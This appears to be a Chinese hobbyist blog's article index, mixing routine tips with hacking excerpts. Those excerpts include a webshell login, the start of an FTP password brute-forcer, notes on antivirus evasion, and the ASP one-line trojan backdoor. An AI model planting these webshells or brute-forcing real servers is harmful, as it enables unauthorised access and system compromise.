Vis0n

文章列表

2008-10-29 19:00

很多人在给系统分区的时候都是输入XX000M，或着输入X*1024M的结果，但是分出来以后分区的大小都不是整数，其实硬盘分区的计算公式存在着一个误差.所得出的整数G并不是标准的1024和1000计算出来的,而是从以下这条公式:
(X－1)×4+1024×X=F
X是你想要分的区的整数G(单位:GB)
F是你要输入的数字(单位MB)

类别：网文 | 评论(1) | 浏览()

运行(CMD)(命令提示符)命令大全

2008-10-29 18:59

gpedit.msc-----组策略　　　　　　　　　　　　　　　　 sndrec32-------录音机
　　Nslookup-------IP地址侦测器　　　　　　　　　　　　　 explorer-------打开资源管理器
　　logoff---------注销命令　　　　　　　　　　　　　　　 tsshutdn-------60秒倒计时关机命令
　　lusrmgr.msc----本机用户和组　　　　　　　　　　　　　 services.msc---本地服务设置
　　oobe/msoobe /a----检查XP是否激活　　　　　　　　　　　notepad--------打开记事本
　　cleanmgr-------垃圾整理　　　　　　　　　　

阅读全文>>

类别：网文 | 评论(0) | 浏览()

wget 使用方法

2008-10-12 19:10

wget [参数列表] URL
首先来介绍一下wget的主要参数：
· -b：让wget在后台运行，记录文件写在当前目录下"wget-log"文件中；
· -t [nuber of times]：尝试次数，当wget无法与服务器建立连接时，尝试连接多少次
。比如"-t
120"表示尝试120次。当这一项为"0"的时候，指定尝试无穷多次直到连接成功为止，这个设置非常有用，当对方服务器突然关机或者网络突然中断的时候，可以在恢复正常后继续下载没有传完的文件；
·
-c：断点续传，这也是个非常有用的设置，特别当下

阅读全文>>

类别：网文 | 评论(0) | 浏览()

php session登陆口简单示例

2007-10-25 20:28

好像很多phpwebshell登陆口都是用的cookie，改写一个session的试一下。

<?php
$adminpass="1"; //管理密码
session_start();
set_time_limit(0);
$password=$_POST['password'];

if(isset($password))
{
session_register("okpwd");
$_SESSION['okpwd']=$password;
}

if($_SESSION['okpwd']!==$adminpass)
{
?>

阅读全文>>

类别：计算机技术 | 评论(0) | 浏览()

暴破FTP用户名和密码(PHP练手作品)

2007-10-25 20:27

<?php
//用法：php 本文件.php FTP的IP 端口用户字典密码字典，示例：php ftp.php 192.168.8.10 21 user.dic pass.dic。可以自己改动sleep里的秒数，暴破成功后用户名和密码保存在同目录下的ok.txt。

//分别取不同用户名和N个密码对应
$user=file($_SERVER["argv"][3]);
$pass=file($_SERVER["argv"][4]);
$countuser=count($user);
$countpass=count($pass);

阅读全文>>

类别：计算机技术 | 评论(3) | 浏览()

汇编”免杀”基础知识总结说明

2007-08-24 14:41

一.机械码,又称机器码.
ultraedit打开,编辑exe文件时你会看到
许许多多的由0,1,2,3,4,5,6,7,8,9,A,B,C,D,E,F组成的数码,这些数码
就是机器码.
修改程序时必须通过修改机器码来修改exe文件.
二.需要熟练掌握的全部汇编知识(只有这么多)
不大容易理解,可先强行背住,混个脸儿熟,以后慢慢的就理解了
cmp a,b 比较a与b
mov a,b 把b的值送给a
ret 返回主程序
nop 无作用,英文“no operation”的简写，意思是“do nothing”(机器码90)***机器码的含义参看上面
(解释:ultraedit打开编辑exe文件时你

阅读全文>>

类别：计算机技术 | 评论(0) | 浏览()

在学校了

2007-08-22 16:25

在学校咯，今天第一次用手机写blog，看文章，感觉还是蛮舒服的，呵呵，以后就可以方便多了…

类别：默认分类 | 评论(0) | 浏览()

ASPX一句话木马--终极版&详细分析(ASP-EXECUTE VS ASPX-EVAL)

2007-08-07 21:50

软件作者：kj021320
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

首先回顾一下以前ASP一句话的经典木马吧！

<%if request("nonamed")<>"" then execute request("nonamed")%>

VBS中execute就是动态运行指定的代码而JSCRIPT中也同样有eval函数可以实现,也就是说ASP一句话木马也有个版本是采用JSCRIPT的 eval的！网上也有例子我就不多说了！.....

然后解析语言终究

阅读全文>>

类别：计算机技术 | 评论(0) | 浏览()

[翻译]DNS（域名服务器）欺骗技术

2007-07-31 20:50

文章作者：Spacefox, Secure Sphere Crew
译文作者：Conan, OS3 (Open Source Software Society) / CICC Singapore(Center of International Cooperation for Computerization in Singapore)
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

概述：什么是DNS欺骗？
DNS欺骗是一门改变DNS原始指向IP的艺术。为了更好的理解，让我们先来看一个例子。如果你想用浏览器去google搜索一些信息，毫无疑问的你

阅读全文>>

类别：计算机技术 | 评论(0) | 浏览()

[翻译]XSS & SQL注入

2007-07-31 20:49

文章作者：CyberPhreak
译文作者：黯魂 [S.S.T]
信息来源：脚本安全小组（www.cnsst.org）

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
X Web Security - XSS & more X
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

~介绍

在这篇文章中我将说明所有关于XSS以及更多相关的知识.通过这篇文档,我希望能让你明白什么是XSS,为什么使用XSS,以及怎样使用XSS.一旦你学会了,你将需要发挥自己的创造力,因为大多数人都修

阅读全文>>

类别：计算机技术 | 评论(0) | 浏览()